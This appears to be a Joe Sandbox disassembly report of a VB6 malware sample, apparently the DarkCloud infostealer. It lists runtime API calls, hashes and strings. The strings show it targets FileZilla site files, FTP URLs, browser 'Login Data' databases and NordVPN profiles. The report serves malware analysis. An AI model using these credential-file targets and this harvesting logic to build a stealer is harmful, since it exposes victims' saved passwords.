                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000068), ref: 004143CC
                                                          • __vbaStrMove.MSVBVM60 ref: 004143FD
                                                          • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 0041441D
                                                          • __vbaFreeObj.MSVBVM60 ref: 0041442C
                                                          • __vbaAryMove.MSVBVM60(?,?,?), ref: 00414453
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 00414466
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00414487
                                                          • __vbaNextEachCollObj.MSVBVM60(00405940,?,?), ref: 004144A4
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00414597
                                                          • __vbaStrMove.MSVBVM60 ref: 004145A2
                                                          • __vbaStrMove.MSVBVM60(00000000,?,00405824,00000000), ref: 004145C0
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 004145C7
                                                          • __vbaStrMove.MSVBVM60 ref: 004145D2
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 004145D9
                                                          • __vbaStrMove.MSVBVM60 ref: 004145E4
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 004145F0
                                                          • __vbaStrMove.MSVBVM60 ref: 004145FD
                                                          • __vbaFreeStrList.MSVBVM60(0000000E,?,?,?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041463D
                                                          • __vbaStrCat.MSVBVM60(===============DARKCLOUD===============,0065A764), ref: 00414659
                                                          • __vbaStrMove.MSVBVM60 ref: 00414664
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 00414670
                                                          • __vbaStrMove.MSVBVM60 ref: 0041467D
                                                          • __vbaFreeStr.MSVBVM60 ref: 00414686
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041469B
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004146EE
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041470B
                                                          • __vbaStrCat.MSVBVM60(\sitemanager.xml,006597C0), ref: 0041472E
                                                          • #645.MSVBVM60(00000008,00000000), ref: 0041474D
                                                          • __vbaStrMove.MSVBVM60 ref: 00414758
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 00414764
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041477C
                                                          • __vbaFreeVar.MSVBVM60 ref: 00414788
                                                          • __vbaNew2.MSVBVM60(00405800,00000000), ref: 004147B3
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00414823
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00414840
                                                          • __vbaStrCat.MSVBVM60(\sitemanager.xml,006597C0), ref: 00414864
                                                          • __vbaChkstk.MSVBVM60(?), ref: 00414886
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405810,000000E8), ref: 004148EE
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041490C
                                                          • __vbaNew2.MSVBVM60(00405800,00000000), ref: 00414928
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405810,000000DC), ref: 0041499A
                                                          • __vbaObjSet.MSVBVM60(?,?), ref: 004149D6
                                                          • __vbaForEachCollObj.MSVBVM60(00405940,?,?,00000000), ref: 004149ED
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414A0D
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00414A21
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414A2F
                                                          • __vbaStrMove.MSVBVM60 ref: 00414A4E
                                                          • __vbaStrMove.MSVBVM60 ref: 00413D91
                                                            • Part of subcall function 0042DDC0: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,00000002,?,?,?), ref: 0042DF0A
                                                            • Part of subcall function 0042DDC0: __vbaStrCopy.MSVBVM60 ref: 0042DF29
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(0042DF6C), ref: 0042DF65
                                                          • __vbaStrMove.MSVBVM60 ref: 00413D2A
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrCopy.MSVBVM60 ref: 004144CC
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004144E0
                                                          • __vbaStrCopy.MSVBVM60 ref: 004144EE
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00414502
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414510
                                                          • __vbaStrMove.MSVBVM60 ref: 0041452F
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041453D
                                                          • __vbaStrMove.MSVBVM60 ref: 0041455C
                                                          • __vbaStrMove.MSVBVM60(?,?,0065A764), ref: 0041457A
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00414581
                                                          • __vbaStrMove.MSVBVM60 ref: 0041458C
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041366A
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00414A66
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414A74
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00414A88
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414A96
                                                          • __vbaStrMove.MSVBVM60 ref: 00414AB5
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00414AD0
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00414AF6
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000094), ref: 00414B32
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00405940,00000068), ref: 00414B92
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00414BD0
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000094), ref: 00414C0C
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000068), ref: 00414C6C
                                                          • __vbaStrCat.MSVBVM60(Url : ftp://,0065A764), ref: 00414C90
                                                          • __vbaStrMove.MSVBVM60 ref: 00414C9B
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00414CA6
                                                          • __vbaStrMove.MSVBVM60 ref: 00414CB1
                                                          • __vbaStrCat.MSVBVM60(00406590,00000000), ref: 00414CBD
                                                          • __vbaStrMove.MSVBVM60 ref: 00414CC8
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00414CD3
                                                          • __vbaStrMove.MSVBVM60 ref: 00414CDE
                                                          • __vbaStrCat.MSVBVM60(0040505C,00000000), ref: 00414CEA
                                                          • __vbaStrMove.MSVBVM60 ref: 00414CF5
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 00414D01
                                                          • __vbaStrMove.MSVBVM60 ref: 00414D0E
                                                          • __vbaFreeStrList.MSVBVM60(00000013,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414D65
                                                          • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00414D7E
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414D96
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00414DAA
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414DB8
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00414DCC
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414DDA
                                                          • __vbaStrMove.MSVBVM60 ref: 00414DF9
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 00414E11
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414E1F
                                                          • __vbaStrMove.MSVBVM60 ref: 00414E3E
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00414E64
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000094), ref: 00414EA0
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000068), ref: 00414F00
                                                          • __vbaStrMove.MSVBVM60(?,?,0065A764), ref: 00414F30
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00414F37
                                                          • __vbaStrMove.MSVBVM60 ref: 00414F42
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00414F4D
                                                          • __vbaStrMove.MSVBVM60 ref: 00414F58
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 00414F64
                                                          • __vbaStrMove.MSVBVM60 ref: 00414F71
                                                          • __vbaFreeStrList.MSVBVM60(0000000E,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00414FB1
                                                          • __vbaFreeObj.MSVBVM60 ref: 00414FC0
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414FD5
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00414FE9
                                                          • __vbaStrCopy.MSVBVM60 ref: 00414FF7
                                                          • __vbaStrMove.MSVBVM60 ref: 00415016
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0041502E
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00415054
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000094), ref: 00415090
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000068), ref: 004150F0
                                                          • __vbaStrMove.MSVBVM60 ref: 00415121
                                                          • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 00415141
                                                          • __vbaFreeObj.MSVBVM60 ref: 00415150
                                                          • __vbaAryMove.MSVBVM60(?,?,?), ref: 00415177
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0041518A
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 004151AB
                                                          • __vbaNextEachCollObj.MSVBVM60(00405940,?,?), ref: 004151C8
                                                          • __vbaStrCopy.MSVBVM60 ref: 004151F0
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00415204
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415212
                                                          • __vbaStrMove.MSVBVM60 ref: 00415231
                                                          • __vbaStrMove.MSVBVM60(?,?,0065A764), ref: 00415250
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 00415257
                                                          • __vbaStrMove.MSVBVM60 ref: 00415262
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 0041526D
                                                          • __vbaStrMove.MSVBVM60 ref: 00415278
                                                          • __vbaStrCat.MSVBVM60(Application : FileZilla,00405824,00000000), ref: 00415289
                                                          • __vbaStrMove.MSVBVM60 ref: 00415294
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041529B
                                                          • __vbaStrMove.MSVBVM60 ref: 004152A6
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 004152B2
                                                          • __vbaStrMove.MSVBVM60 ref: 004152BF
                                                          • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,00000000,00000000,00000000,?,00000000), ref: 004152EB
                                                          • __vbaStrCat.MSVBVM60(===============DARKCLOUD===============,0065A764), ref: 00415306
                                                          • __vbaStrMove.MSVBVM60 ref: 00415311
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041531D
                                                          • __vbaStrMove.MSVBVM60 ref: 0041532A
                                                          • __vbaFreeStr.MSVBVM60 ref: 00415333
                                                          • __vbaStrCopy.MSVBVM60 ref: 00415348
                                                          • __vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?,00415489), ref: 00415431
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,00000000,004030D6), ref: 00415443
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,00000000,004030D6), ref: 00415452
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 0041545B
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,00000000,004030D6), ref: 00415467
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 00415470
                                                          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 00415479
                                                          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 00415482
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Copy$CheckHresult$List$Error$BoundsGenerate$CollEachNew2$Chkstk$#645BstrDestructNextUbound$#516#631$#537#608#632
                                                          • String ID: %$013B331C3810262F625E4C$121C073600320F26382B0364626333011F3D221C2E3605$23051E051502351E66484C$232B3119$292D0B02$2B05173A$2F3A1E1C011017011C0822776B4C1C1932223138$303C2B25$33250134392504126B5048$===============DARKCLOUD===============$Application : FileZilla$GnJnphsvuugLWQlLpVEXVpZ$OswqqzaZrFrliPZWuqWKCNs$Server$TcDrGNJvvKjh$TsJBjnGaVJTXmCZLPDiQTvFLVphStxldHrXdpGCrMOT$TyByvsFtDEqry$Url : ftp://$\accounts.xml$\recentservers.xml$\sitemanager.xml$keONWvDpKfSIpBeJlhvrDso$lTHVnVqKJBd$xSlwZiQnRQDmDXCuhsXxuBZdyNiiKUGCJV$ycjdNikmPGuofJBlFuYhiU
                                                          • API String ID: 2863888553-2646638358
                                                          • Opcode ID: 584e366f406b0930e0655fefdd54eb915662b6bb6a5660477b45127905f4bd37
                                                          • Instruction ID: d0dea3cc7f5c8e9f14b529e8d927f0d9802cd4780a62f45803ddd7a5cefcf977
                                                          • Opcode Fuzzy Hash: 584e366f406b0930e0655fefdd54eb915662b6bb6a5660477b45127905f4bd37
                                                          • Instruction Fuzzy Hash: A243E575900218DFDB14DFA0DD88BDEB7B5FB48301F1082AAE50AB72A4DB745A89CF54
                                                          APIs
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0040D60A
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0040D627
                                                          • __vbaStrCat.MSVBVM60(004055A8,00659730), ref: 0040D64B
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D659
                                                          • __vbaAryMove.MSVBVM60((En,?,?,0043D064), ref: 0040D682
                                                          • __vbaFreeStr.MSVBVM60 ref: 0040D68E
                                                          • __vbaUbound.MSVBVM60(00000001,006E4528), ref: 0040D6B9
                                                          • __vbaI2I4.MSVBVM60 ref: 0040D6C1
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D722
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D73C
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D74D
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D775
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D796
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 0040D841
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0040D848
                                                          • __vbaUbound.MSVBVM60(00000001,006597C0), ref: 0040FD78
                                                          • __vbaI2I4.MSVBVM60 ref: 0040FD80
                                                          • __vbaStrCat.MSVBVM60(004055A8,006597C0), ref: 0040FE6E
                                                          • __vbaStrMove.MSVBVM60 ref: 0040FE7C
                                                          • __vbaAryMove.MSVBVM60((En,?,?,0043D064), ref: 0040FEA5
                                                          • __vbaFreeStr.MSVBVM60 ref: 0040FEB1
                                                          • __vbaUbound.MSVBVM60(00000001,006E4528), ref: 0040FEDC
                                                          • __vbaI2I4.MSVBVM60 ref: 0040FEE4
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040FF44
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040FF5E
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040FF6F
                                                          • __vbaStrMove.MSVBVM60 ref: 0040FF97
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00412DD7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Copy$ErrorUbound$BoundsFreeGenerate$Overflow
                                                          • String ID: (En$013B331C3810262F625E4C$1$1D012D3D2A24701E0A2738$2633230215490E3927040209$2F08281B2E3626210D0118786A702B17251D031D0C$33250134392504126B5048$333D2D2928333C13241805111D34572E34002C$5E7B360D06182A173D16240F110620596B1110093F020E1C3162355D1A22152F28$65620A163C371A0404081A3605092F5C6C3320323636253F1D54156C050B0F263F$===============DARKCLOUD===============$AJMysHCsjcSZXddJaKcAAE$EoyHOIFPgxTjvtZwjUtMeZQ$NordVPN$Profiles$TcDrGNJvvKjh$\Profiles$\User Data$\User Data\Default\Login Data$anxXwGUGUdnvXPPexWyUMBU$azFPgggmVIbknbWTCKHORYF$jAMBZCJPZkSYHclvQlTnjDT$lTHVnVqKJBd$oqTEhrlCyZMdapkEdLDclMl
                                                          • API String ID: 2627448202-2245370215
                                                          • Opcode ID: 29d6bef24f3533a7a31a53c8349ea6d816c50b52bc48a358010fff522edc5deb
                                                          • Instruction ID: 9f8d0edf5cefd390c6526526bf223bc4a2d14f22ff7b2c8f7ac3ca6ad98ebe04
                                                          • Opcode Fuzzy Hash: 29d6bef24f3533a7a31a53c8349ea6d816c50b52bc48a358010fff522edc5deb
                                                          • Instruction Fuzzy Hash: 79331A70A00218DFDB24DF60DD84BDAB7B5FB48304F1085EAE54AB72A0DB745A89CF58
                                                          APIs
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D722
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D73C
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D74D
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D775
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D796
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0040D7E4
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0040D801
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 0040D841
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0040D848
                                                          • #645.MSVBVM60(00000008,00000000), ref: 0040D867
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D875
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 0040D881
                                                          • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,00000000,00000000), ref: 0040D8C9
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00000000,004030D6), ref: 0040D8D8
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,00000000,004030D6), ref: 0040D93B
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,00000000,004030D6), ref: 0040D958
                                                          • #712.MSVBVM60(006E4528,\User Data,00405638,00000001,000000FF,00000000,?,?,?,?,?,?,00000000,004030D6), ref: 0040D987
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,00000000,004030D6), ref: 0040D994
                                                          • __vbaLenBstr.MSVBVM60(00678914), ref: 0040D9BC
                                                          • #709.MSVBVM60(00678914,004055A8,000000FF,00000000), ref: 0040D9D3
                                                          • #619.MSVBVM60(?,00004008,00000000), ref: 0040D9F0
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 0040D9FD
                                                          • __vbaStrMove.MSVBVM60 ref: 0040DA0A
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040DA16
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040DA2E
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040DA48
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040DA59
                                                          • __vbaStrMove.MSVBVM60 ref: 0040DA81
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040DAA2
                                                          • __vbaNew2.MSVBVM60(00405678,00000000), ref: 0040DAB7
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DB3A
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DB57
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 0040DB98
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0040DB9F
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405668,00000028), ref: 0040DBFB
                                                          • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 0040DC3F
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040DC4E
                                                          • __vbaStrCat.MSVBVM60(\User Data\Default\Login Data,006E4528,?,?,?,?,?,?,00000000,004030D6), ref: 0040DCE3
                                                          • #645.MSVBVM60(00000008,00000000), ref: 0040DD02
                                                          • __vbaStrMove.MSVBVM60 ref: 0040DD10
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 0040DD1C
                                                          • __vbaFreeStr.MSVBVM60 ref: 0040DD37
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040DD43
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00412DD7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Error$BoundsGenerate$BstrCopy$List$#516#631#645$#537#608#619#632#709#712CheckHresultNew2Overflow
                                                          • String ID: (En$013B331C3810262F625E4C$1$1D012D3D2A24701E0A2738$2633230215490E3927040209$2F08281B2E3626210D0118786A702B17251D031D0C$33250134392504126B5048$333D2D2928333C13241805111D34572E34002C$5E7B360D06182A173D16240F110620596B1110093F020E1C3162355D1A22152F28$65620A163C371A0404081A3605092F5C6C3320323636253F1D54156C050B0F263F$===============DARKCLOUD===============$AJMysHCsjcSZXddJaKcAAE$EoyHOIFPgxTjvtZwjUtMeZQ$NordVPN$Profiles$TcDrGNJvvKjh$\Profiles$\User Data$\User Data\Default\Login Data$anxXwGUGUdnvXPPexWyUMBU$azFPgggmVIbknbWTCKHORYF$jAMBZCJPZkSYHclvQlTnjDT$lTHVnVqKJBd$oqTEhrlCyZMdapkEdLDclMl
                                                          • API String ID: 3691625242-2245370215
                                                          • Opcode ID: 0d79cb70a671f2482597cc55c55be1d0286c109c534531b9f9a0c7f8ffb0aec8
                                                          • Instruction ID: 449b54784862ceb2160d55d7b836dd58d6e0b4a5a777826c3ebbb3504bfb4cc8
                                                          • Opcode Fuzzy Hash: 0d79cb70a671f2482597cc55c55be1d0286c109c534531b9f9a0c7f8ffb0aec8
                                                          • Instruction Fuzzy Hash: FF231A71A00228DFDB24DF50DD84BDAB7B5FB48304F1085EAE54AB72A0DB745A89CF58
                                                          APIs
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004346B6
